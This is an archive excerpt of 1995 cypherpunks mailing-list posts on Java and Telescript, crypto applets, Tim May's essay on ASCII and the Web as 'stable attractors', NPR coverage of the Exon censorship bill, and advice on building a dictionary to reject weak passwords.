    + You agree to not resell it or provide a product or service based
      on it without reaching an agreement with AT&T first.
    + You agree that if you create a derivative work, you will license
      it to AT&T on a royalty-free basis.  (I'm also told that some of
      the wording means that hardware specific things are excluded).

There's nothing about modifications becoming the property of AT&T.

The license is on the Web at http://plan9.att.com/plan9/shrink.html.

--keith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 21 Jul 95 08:05:11 PDT
To: cypherpunks@toad.com
Subject: Cyberporn on NPR today
Message-ID: <9507211504.AA22710@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



Talk of the Nation on NPR is having a call-in program this afternoon
on the "pervasiveness of cyberporn".  I think it's 1:00 or 2:00.
Crypto-relevance... 4 horsepeople... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 21 Jul 95 07:37:14 PDT
To: pgf@tyrell.net (Phil Fraering)
Subject: Re: And another thing...
In-Reply-To: <199507202233.AA15359@tyrell.net>
Message-ID: <m0sZJsw-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> As usual, one final question came to mind right after
> sending the last message:
> 
> Why is Java the next hot thing instead of Telescript?
> 
> Was Telescript ever opened up for general use or was it
> mainly used for AT&T's Personalink network?
> 
> Phil


Unless I'm mistaken, Telescript was part of General Magic's technology.
Besides the language deficiencies, IMHO, they would release almost
nothing to the general developers, much less a sample implementation
to be ported.  It's almost impossible to develop for: you need a souped
up MAC, a developer PDA, etc...

(I'm talking about Magic Cap (the OS) development in which I think the
language was called Telescript.)

Compared to a powerful Unix development environment (if and when it gets
ported to Linux, HPUX, or SGI that I use...(no longer in a Sun shop),
it really seem awful.  It was also very buggy as late as mid last
year.

OTOH, I wrote a piece of software that interprets the raw async data from
satellite and chops it into articles.  (Reuters special feed for Magic
Cap clients...)

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 21 Jul 95 11:26:32 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re:  Java (was Netscape: the big win)
Message-ID: <v02120d0cac35a6940b17@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>So, what would be a "cypherpunk" thing you could do with Java?  I know
>I can use it to download little applets to my system to do animations.
>What can it do to enhance my privacy?  What would be the Java equivalent
>of PGP?
>

Portable PGP with a GUI interface that didn't suck?

Note that I'm championing the use of Java as a portable language,
with a portable windowing toolkit, that will (real soon now) have
commercial tool support from a variety of vendors, as well as free
tools available on the net (the best of both worlds.)

The whole issue of how to do cryptography with applets is kind of
complicated, and is something Amanda and I have been working on very
dilligently. They hard part is determining what the interface is
between trusted code (that you have installed on your machine, or
ultimately, that you've specifically designated as being trusted
based on secure hash) and untrusted code that comes from random
web sites on the net.

In general, for any general-purpose cryptography tool, you're going
to want almost all of it to be based on locally-installed, trusted
code. Certain protocols can actually work much better using applets,
but they should only be allowed to access a very narrow set of local
routines that directly interface with the user. (e.g. "Do you really want
to sign this?", "Confirmed signed by so-and-so.", etc.)

This is, however, a separate issue from the use of Java to do
standalone applications.

See: http://www.cs.utexas.edu/users/achou/JCrypt/packages.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 21 Jul 95 09:38:42 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Something occured to me
Message-ID: <Pine.ULT.3.91.950721113352.5103A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

About two weeks ago, there was some talk in here with regards to holding 
DC lawmakers crominally liable for passign bad laws.  This was followed 
up with postins pointing out that you can't do that.

However, this morning I remembered something.

Whent he republicans took over the congress, they instidtued that 
Contract on America.   One of the first laws that was passed (by both 
parties, I might add) was a law that made lawmakers abide by the same 
laws that "normal" people abide by.

Does this change, in any fashion, the original idea?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMA+76DokqlyVGmCFAQEmdgQAsM6fAjnwWMDqCIHQG2HGp6ECY3ITexxr
N8HFSTZUN7C34fPhAkTmUgalSKbv15Pcca8QXTutXTxhBAXsbTn8rCuQNhdjzigN
pXl77a/KRkQqkMCED9DoRkemD3Pt4zPAtQDJbcHmSfokovUSr0q0cFZF8aveCmAB
hEyRQEIFgAo=
=Ha4N
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 11:36:05 PDT
To: cypherpunks@toad.com
Subject: "Where is the Market?"
Message-ID: <ac352cdc150210046a6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I want to elaborate on the words from last December that I just posted, in
response to some comments about how I had just "discovered" the Web.

L. McCarthy just had some good points about differing privacy/political
goals here on this list.

When we first formed, almost three years ago, one of the first things we
did at a physical meeting--and the issue was echoed on the new mailing
list--was to conduct a poll of who was using what mail tools, e.g., pine,
elm, emacs, Microsoft Mail, MCI Mail (?), Lotus Notes, Eudora, etc. The
results--which should be in the archives for sometime around
November-December 1992--were, as expected, all over the map. No clear
winner. The reason for the poll was obvious: to determine what sort of
target markets the various PGP integrators would have.

Even then, there were religious wars, with, for example, the emacs crowd
arguing that PGP should be integrated into emacs and then the world could
just switch to emacs (as they should have long before :-)).

Now I wish I could draw pictures here---and that I can't draw pictures here
and still communicate with most of you here makes an interesting point
about the still-dominant nature of ASCII, which ain't about to change
anytime soon for lists like this---so I could better explain my "stable
attractors" line of reasoning. But I'll do it instead with more words.


Here's an elaboration on my points made last December 15:


"I see two "stable attractors" for text/graphics/multimedia/etc. sent
over the Net:"

What I mean by "stable attractors" are the "islands" or regions in product
space that have solidity and success. Leading commercial products are
obvious examples, with a cloud of related or ancillary products supporting
them. Product versions are like a chain of these islands.

As with "attractors" in general (and I assume everyone on this list has
read much about attractors, usually in the context of strange attractors),
there are not many "occupied" regions in the nether-realm between
attractors. That is, between the islands lies open water. "Survival" is
difficult in these open waters.

My main model for software, borne out by everything I see, is that this
"island colonization" model is appropriate.


"1. Straight text, ASCII, 80 column format. All systems can handle
this, all mailers and newsreaders can handle it, it's what the Usenet
is essentially based upon, and it gets the job done. It meets the
needs of 95% of us for 95% of our needs."

By this I mean just what this list is doing _now_. ASCII is the de facto
lingua franca. People with PCs, various operating systems on their PCs
(DOS, Win3.1, Win95beta, Linux, OS/2, NeXTStep, Solaris, etc.),
Macintoshes, terminals, Amigas, Ataris, Suns, SGIs, NeXTs, and so on, are
all mostly able to read what is distributed here.

Deviations occur, but mostly unintentially or as "experiments."
Occasionally people will still try to send NeXT-formatted mail--I forget
what it was called--and various people send their messages as
"attachments," even when the text is apparently just straight ASCII.

(Hint to the attachment-senders: I periodically go into the "Attachments"
folder on my system and empty it of the unread big and little attachments
that have accumulated in it...others have said they do the same. So, if
your message will fit into the standard text/ASCII "primary format" of the
Cypherpunks list, that is how you should send it...and if it _isn't _
straight text, but instead includes attached spreadsheets, JPEG movies of
the Waco raid, etc., you might ask yourself just how many people will
bother to read or view your message?)

Hence my comment that "the written word" is a massively stable, heavily
colonized "island" or "attractor." It can be handled in foreign languages,
with some difficulty, and on nearly any computer system in the world. It is
the language of legal briefs, of economic reports, of crop reports, and of
a zillion other forms of communication. Pure text is powerful stuff.

But what about pictures, illustrations, diagrams? Magazines and books use
them widely, so why can't we? And what about styled text, footnotes,
superscripts, hypertext links, etc.?

Well, in a different world we might have adopted standards earlier than we
did and such things might be more common and acceptable today.

(For those who will argue that it is "possible" to exchange e-mail with
embedded diagrams, equations, footnotes, etc., "sure."  But ask yourself
how many times you have ever actually _done_ this, with friends and e-mail
correspondents? Some who have done this point out that it usually involved
folks within corporations who can standardize on the tools and default
settings to make this transparent...then they can send richly-formatted
stuff without excessive work. And how many other mailing lists, besides
Cypherpunks, have such embedded diagrams and illustrations? I'm not talking
about the Web here--I'll get to it in my next point--but about what this
list is and what NetNews, for example, is.

What will "the masses" likely use to implement a richer communications
channel, one that encompass pictures, illustrations, movies, spreadsheets,
etc.? What will be the _next_ big island people colonize? (Which is of
obvious interest for the deployment of crypto to users.)

From Dec. 15:


"2. The Web, for graphics, images, etc. This will be the next main
stable attractor, deployed on many platforms. (I'm assuming the debate
here about Netscape standards does not imply much of a fragmentation,
that Mosaic, Netscape, MacWeb, etc., will all basically be able to
display Web pages in much the same way.)"

Enough people are starting to "surf the Web" (whatever you think of that
expression) that this is becoming the _de facto_ next attractor, or island.
_Millions_ of users will have whatever tools and "helper apps" in their
versions of Mosaic, Netscape, MacWeb, etc. such that this will be the
platform/environment of choice. As the browsers add e-mail (receiving, as
most or all can send mail), and as applets/helpers proliferate, then these
platforms/environments will allow new forms of e-mail to finally become
_widespread_ (note that I did not say "possible," but instead said
"widespread").

Many folks I have expressed this view to have said "But the Web is not a
two-way medium like e-mail." That is, most people spend most of their time
on the Web "reading" (viewing) the stuff others have put on the Web.

Three points:

1. This is changing already, as "feedback" is included on pages. This
feedback is beginning to look like local newsgroups, and will become more
so (IMO).

(Speculation: The current Usenet "feed" is of course huge. It may get
replaced, via evolution/revolution, by a shift to a Web-oriented system of
local newsgroups. What I mean by this is that instead of reading, say,
"alt.cypherpunks," one points one's browser at
"http://www.cypherpunks.org/" and uses one's various Web tools to browse,
sort, search, read, and respond to comments of others. BTW, this could be
done today, and might be a better alternative than creating
"alt.cypherpunks." The current approach of shipping the entire Usenet feed
to all the sites that carry it is likely to eventually break down.)

(Even more speculation: Currently I point my Netscape at which news server
I wish, from a choice of several. The idea of "subscription-based" News
sites is an interesting one. I might pay extra money for a site that is
very current and carries all News groups, while parents might pick a site
that is sufficiently sanitized for them, a site they let their children
access. Much more to say here, but I see several Cypherpunks themes.)

2. The easy-to-use integration of helper apps into Web browsers will confer
the same capabilities on mailers that are now associated with these Web
browsers. (Again, don't tell me what _your_ mailer can now do, look to what
the millions of people are using...they'll gain a lot when their mailers,
whether part of Netscape or MacWeb or not, can automatically handle things
their browsers can now handle.)

3. The main development seems to me to be in Web tools these days. Being a
user of "tin" for several years, and seeing minimal development of it the
past two years, I've seen tin get almost no new features. Ditto for "elm,"
my mailer (when logged-on to Unix systems). (Before you comment, I can't
speak for trn, nn, rn, etc., or mailers such as pine. But friends of mine
have told me the same stagnation is happening with other mailers and
newsreaders. Many of the developers of tin, elm, archie, gopher, etc., have
moved on to bigger and better things.))

So, given that it has long been recognized as a valid Cypherpunks goal to
see what people are using for mail and newsreading, I think an analysis of
what's likely to be popular amongst the "masses" is valid. (I don't disdain
the "masses," at least not in this context. The needs of a lawyer wanting
to communicate securely with his client are not the needs of a C hacker
wanting to configure his Linux box to auto-sign his emacs messages.)

My views on the Web have *not* changed dramatically since last fall and
winter when I was talking in these terms, though all I had then was a
text-oriented browser (lynx), and it was not very exciting (as Ray Cromwell
also notes).

(And I recall this discussion on the importance of the Web going on several
times earlier, including a prediction/hope by the Extropians list
organizers, including Harry Shapiro (Hawk) that the Web could be the
solution for distributing graphics-content mailing lists...this was around
1993 sometime.)

I'm definitely not "dissing" Unix, though I personally never had much use
for it. The world is made up of all kinds of people. Some are hackers, some
are expert cryptographers, some are lawyers, and so on. The needs of a
lawyer for computer tools and writing aids are quite a bit different from
those of someone who wants to put together a Linux box for C hacking.

If I sound snide in my comments about Linux, I don't mean to be. What I
mean is that very, very few users, even fairly sophisticated users, are
going to be doing their work on Linux boxes. (If I'm wrong about this, and
Linux becomes a serious deployment system--as opposed to a Sun-killer,
which is what it looks like now--then I'll acknowledge that I was wrong.)

As cheap boxes to deploy remailers and Web sites on, Linux sounds like a
win. I'm unconvinced that it has a future for _general_ users, though. (And
by general users I don't mean computer-phobic newbies, I mean the folks
buying Windows in the tens of millions and Macs in the millions per year.
Wider use of crypto means these users, not just the current PGP users.)

Nothing has changed my view that the Web is clearly the next big attractor,
the next big island. Integrating crypto into it is likely the next big win,
which is how this latest thread started. (And by "integrating crypto into
it" I don't necessarily mean getting the source code from Netscape or Spry
or whomever and adding it...the integration can be done in multiple ways, I
think, and as several folks here are already thinking about.)

In any case, the future will unfold as it unfolds. Maybe I'm right, maybe
not. Maybe only partially right.

Debate is healthy, and at least this debate is closer to being on-topic
than discussions of red mercury (and the even rarer columbium-niobum alloys
the Japanese have developed) and Cypherpunks logos.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 21 Jul 95 08:45:24 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507210121.VAA29893@bb.hks.net>
Message-ID: <199507211545.LAA18993@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> >   The answer is: integration. While TRN is a great newsreader, and 
> >Eudora's a great mail reader, etc, if I read a post in TRN or a message
> >in Eudora, there is no hyperlinking. If I see a link or reference,
> 
> If you used a Mac, all you had to do is click on the URL in your mailer,
> newsreader, even some text editors, and the correct helper aplication will
> open the URL.

  Yeah, but does it fire up 1 browser process everytime you click on it, or
will it command an already running browser to follow the link? Secondly,
this still doesn't solve the problem of interactive content and custom
interfaces. With Java, you can build arbitrarily complex web interfaces
with objects that can be linked together. An example of this is Sun's
Spreadsheet Java App which is connected to a StockQuote app which runs
a cute ticker tape scroller in the page. If you fill out the spreadsheet
with stock symbols and amounts, it automagically updates your net-worth
in real time, and simultanteously updates a line graph of your net worth
in a window below. I can imagine a newsreader app which automagically
pulls ratings down from a server and communicates with other apps in the
same page.

(plus, Tetris, Reversi, and Video Poker running within a web page with
text and links wrapped around them is really cool!)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Owen Lynn <lynnowe@netcom.com>
Date: Fri, 21 Jul 95 11:47:56 PDT
To: cypherpunks@toad.com
Subject: Phrack SummerCon - I enjoyed your talk
Message-ID: <Pine.3.89.9507211150.A812-0100000@netcom3>
MIME-Version: 1.0
Content-Type: text/plain


Eric,

I was there in 'lanta when you gave your talk at SummerCon, and I
thoroughly enjoyed it. I was especially intrigued by some of the, um,
fun you can have with corporations. Are there any books I can read
that are sort of _Fun with Your Corporation for Beginners_?

fnord






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 21 Jul 95 08:47:39 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: And another thing...
In-Reply-To: <m0sZJsw-0009tNC@sdwsys>
Message-ID: <199507211546.LAA27197@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



> (I'm talking about Magic Cap (the OS) development in which I think the
> language was called Telescript.)

I spent a lot of time talking to them..

While there was some telescript embedded in Magic Cap, Telescript was
(and I think still is) a seperate Networking/Server product.

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 12:18:19 PDT
To: scifri@npr.org
Subject: Today's Internet discussion on Science Friday
Message-ID: <199507211916.MAA18932@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!  I just saw that you'd be discussing the Exon Censorship Bill
discussion on today's Science Friday on Talk of The Nation; I found out
from a mailing list on the Internet, and had time to tune in,
but not enough advance warning to attack-dial and become the one lucky
caller who actually got on :-)

You picked a well-balanced set of interviewees; I was a bit disappointed
by the time balance between discussion and callers.  It would also be
nice if you extended the on-line discussion to the Internet as well as
the commercial services AOL and Compuserve, since that extends the collection
of people who can be involved in the discussion.

[Summary for list-folk - the speakers were Bruce Taylor of National Law Center
for Children and Families (sounds like a Pat Robertson thing), Dan Weitzner
of CDT,
and Larry Maggoth(sp?) who wrote the Child Safety on the Info Superhighway
pamphlet.
Larry led off, Taylor dominated the discussions, Weitzner mostly wimped out.
Everybody agreed that there's obscenity on the Internet if you want to find it,
and that it's great that we have obscenity laws to punish Bad People and
Protect Kids;
Rimm's bogus numbers weren't discussed, the indecency-vs-obscenity was starting
to be discussed but got cut off by time.]
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 12:32:40 PDT
To: gorkab@sanchez.com (It's supposed to crash like that.)
Subject: Re: big word listing
Message-ID: <199507211931.MAA21230@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>| As a security measure, I am trying to get a massive dictionary of words
>| together, and each time a user changes his/her password, it checks the
list to
>| see if the password is in it.  My question is, are there any pre-built
lists of
>| this nature?  I am currently only using a spelling dictionary, and would like
>| something a little bigger.
>
>	Look on coast.cs.purdue.edu in the password/Crack areas.

There are also Grady Ward's Moby Words and related moby-listings, though
things like Crack will probably do a more thorough job of variants like
word, drow, w0rd, word0, drow0, word1, 0word, 1word, word1word, etc.
which people use to complicate their passwords.

Caveat: If you're building it on Unix, _don't_ set up the command to
take the proposed password on the command line, e.g. "checkpass foobar2",
since that makes it visible to anyone who runs ps.  Feed it through stdin,
or set it as a variable and fork, or something like that.
And remember that binary searches are _far_ faster than reading whole
dictionaries,
and hashes are even faster if you're willing to preprocess more.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wb8foz@nrk.com (David Lesher)
Date: Fri, 21 Jul 95 08:41:42 PDT
To: hal9001@panix.com (Robert A. Rosenberg)
Subject: Re: It had to happen...
In-Reply-To: <v02130500ac34ed849b30@[165.254.158.4]>
Message-ID: <m0sZLCu-0005BTC@nrk.com>
MIME-Version: 1.0
Content-Type: text



> >Has anyone caught this yet? From "No Such Agency" to having
> >their own Web page... wow.
> >
> >http://www.nsa.gov:8080/

> They've been on the net for years. They were dockmaster (I do not remember
> the domain) and were mentioned as such in Cuckoo's Egg. The address is
> probably being run by the same section as dockmaster is/was (RTM Sr's
> Group).


Note that last I heard RM Sr. had retired & moved to New England.
He is an interesting ....character... for lack of a better word.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Fri, 21 Jul 95 08:41:25 PDT
To: cypherpunks@toad.com
Subject: House Waco Hearings
Message-ID: <199507211541.KAA00499@crl.com>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 21 Jul 95 12:58:26 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com>
Message-ID: <199507211958.MAA19853@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "It's supposed to crash like that." <gorkab@sanchez.com> writes:
> As a security measure, I am trying to get a massive dictionary of words
> together, and each time a user changes his/her password, it checks the list t o
> see if the password is in it.  My question is, are there any pre-built lists of
> this nature?  I am currently only using a spelling dictoinary, and would like
> somthing a little bigger.

Yes, there are -- see ftp.ox.ac.uk for a lovely set of them.  This is a
reasonable approach, but it's insufficient: you also need to check lots of
variants on the words.  I'd suggest looking at the code in Programming
Perl (Larry Wall and Randal L. Schwartz) for checking potential
passwords, and I'd suggest looking at the initial ruleset used by Crack,
the Unix password cracking tool; the same rules should be good for any
kind of password scheme.

Also you should be aware that cracking passwords is passe' these days:
it's much easier to run an ethernet sniffer and gather them wholesale.
Every little bit helps, though.

	Jim Gillogly
	Sterday, 28 Afterlithe S.R. 1995, 19:54




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ben@reston.opnsys.com
Date: Fri, 21 Jul 95 10:09:44 PDT
To: cypherpunks@toad.com
Subject: Louie Freeh
Message-ID: <Pine.A32.3.91.950721125034.18393A-100000@reston.opnsys.com>
MIME-Version: 1.0
Content-Type: text/plain




    I was just listening to the G. Gordon Liddy Show, he was talking to a 
reporter for the American Spectator, which has a piece on our favorite 
FBI director Freeh. From the sound of the reporter the story is very 
damming, on everything from Waco to the entrappment of Malcolm X's 
daughter.


						Ben Hill
						From the land of the Freeh






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 21 Jul 95 10:04:26 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Java (was Netscape: the big win)
In-Reply-To: <199507202345.QAA16459@jobe.shell.portal.com>
Message-ID: <199507211704.NAA12861@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> So, what would be a "cypherpunk" thing you could do with Java?  I know
> I can use it to download little applets to my system to do animations.
> What can it do to enhance my privacy?  What would be the Java equivalent
> of PGP?


* Protocol Handler
  implement a remailer:  URI that automagically communicates with remailers
  implement a pgp: URI that can decode pgp signed/encrypted text 
     automagically. Use this to implement a server where users can post
     encrypted messages for other users, and the user, upon clicking the
     link, say pgp://rays_message_to_hal.html, gets the message automatically
     decoded. The encrypted text could even be HTML!
  implement an anonymous mailto: URI that works like mailto:, but uses
    an anonymous return block or blindserver automatically

* Content Handlers
  implement a handler to decode PEM/RIPEM or any other kind of crypto 
     MIME type
  implement a handler to check signatures, that way users could use
   a multipart message, the first part being a text/html or text/plain,
   the second part being a signature. The handler would automatically
    check the signature and notify the user that the content he is 
    reading is authenticated (by beep, or icon, or title bar, whatever)

* Applications

Implement a Elm-like mailer app, complete with editor, that can send 
    rfc822 normal mail, or, optionally, send thru any remailer chain
    at the click of a radio button

  Implement an object which can open a socket to key server or list
    of remailers server, get the list, display properties, etc

  
The possibilities are endless. All of these things can be done in emacs, but
unlike emacs, Java will be embedded into Netscape meaning the installed based
of users will be much larger.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Trost <trost@cloud.rain.com>
Date: Fri, 21 Jul 95 13:44:50 PDT
To: cypherpunks@toad.com
Subject: Re: The OS wars and DOOM...
In-Reply-To: <199507211218.AA20295@tyrell.net>
Message-ID: <m0sZOPM-00004PC@cloud.rain.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
    Given that games usually program close to the hardware, and are 
    therefore the _most_ difficult things to port from one environment
    to another, it really makes one wonder why Excel isn't out for
    (for example) Linux or BSD today.

Microsoft has lots to lose from making software available to systems
that "comptete" with MS-DOG and Windoze.  It's clearly in their best
interests to not make their software run under Unix and/or X11
(although WABI has some interesting implications in that regard).

On the other hand, that would seem to imply that it's in a lot of
other people's interest to port their software -- every little bit of
leverage against Microsoft helps.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "It's supposed to crash like that." <gorkab@sanchez.com>
Date: Fri, 21 Jul 95 10:30:34 PDT
To: cypherpunks@toad.com
Subject: big word listing
Message-ID: <00993AF518E527C0.00011F64@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


As a security measure, I am trying to get a massive dictionary of words
together, and each time a user changes his/her password, it checks the list to
see if the password is in it.  My question is, are there any pre-built lists of
this nature?  I am currently only using a spelling dictoinary, and would like
somthing a little bigger.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Fri, 21 Jul 95 10:34:03 PDT
To: rjc@clark.net
Subject: Re: Netscape the Big Win
Message-ID: <9507211733.AA17337@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From owner-cypherpunks@toad.com Fri Jul 21 13:24:22 1995
|   From: Ray Cromwell <rjc@clark.net>
|   Subject: Re: Netscape the Big Win
|
|   > If you used a Mac, all you had to do is click on the URL in your mailer,
|   > newsreader, even some text editors, and the correct helper aplication will
|   > open the URL.
|   
|     Yeah, but does it fire up 1 browser process everytime you click on it, or
|   will it command an already running browser to follow the link? 

You can't have multiple processes running on a Mac. (Unless the application
has a different name -- for example, you *can* have two different copies of
the Netscape application, named "NS1" and "NS2", set as the default "helpers" 
for a) news and b) HTTP, should you want to do that...)

What ICeTEe does is send an Open AppleEvent to the browser application.
If it is running, it responds by opening the URL in the browser. If the browser
isn't running, it starts the browser and then opens the URL. The INIT
(extension) patches the System "TextEdit" routines, which are used in most
apps with limited need for text processing. The name of the INIT comes from
its authors, who wrote "InternetConfig", and because it patches "TextEdit".

This isn't to say that Java isn't cool :-)

Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 21 Jul 95 10:41:27 PDT
To: gorkab@sanchez.com (It's supposed to crash like that.)
Subject: Re: big word listing
In-Reply-To: <00993AF518E527C0.00011F64@sanchez.com>
Message-ID: <199507211738.NAA01082@spl.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| As a security measure, I am trying to get a massive dictionary of words
| together, and each time a user changes his/her password, it checks the list to
| see if the password is in it.  My question is, are there any pre-built lists of
| this nature?  I am currently only using a spelling dictoinary, and would like
| somthing a little bigger.

	Look on coast.cs.purdue.edu in the password/Crack areas.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 14:23:09 PDT
To: hfinney@shell.portal.com>
Subject: Re:  Java (was Netscape: the big win)
Message-ID: <ac3568170402100454ef@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Personally, I think the whole recent debate here about Java, Netscape, TCL,
Safe-TCL, Telescript, Linux, etc., has been very useful and stimulating.
The detailed exposition of ideas by Ray Cromwell, Doug Barnes, Hal Finney,
and several others is exactly what this list is all about.

At 7:24 PM 7/21/95, Douglas Barnes wrote:

>Note that I'm championing the use of Java as a portable language,
>with a portable windowing toolkit, that will (real soon now) have
>commercial tool support from a variety of vendors, as well as free
>tools available on the net (the best of both worlds.)
>
>The whole issue of how to do cryptography with applets is kind of
>complicated, and is something Amanda and I have been working on very
>dilligently. They hard part is determining what the interface is
>between trusted code (that you have installed on your machine, or
>ultimately, that you've specifically designated as being trusted
>based on secure hash) and untrusted code that comes from random
>web sites on the net.

Ray's list of the many applet-based applications (so to speak). this stuff
Doug is working on, and Hal's ideas, all could lead to a next-generation of
Web-oriented user tools.

I have no idea, of course, which of the various languages and tools will
succeed. But it's good to see so much interest the past year or two in new
languages...it was looking for a while like C++ would be the only game in
town.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 11:31:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win(dows)
Message-ID: <199507211829.OAA08315@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac35228910021004fd83@[205.199.118.202]>, tcmay@sensemedia.net
(Timothy C. May) wrote:

>Out of curiousity, the phrase "grown out of Netscape," aside from the
>implied barb, means what? Just what am I missing and what do I need to
>"grow out of"?

Tim,
I won't presume to speak for Robert, but I can tell you this:

Netsacpe/Mosaic is an awsome program. It fundamentally changed the way I
use and access the net. 

Going from terminal emulation to the present version of Netscape, as you
have,  can not fail to impress an individual. This is similar to the awe
one might feel when going from a typewriter to a computer with MS Works
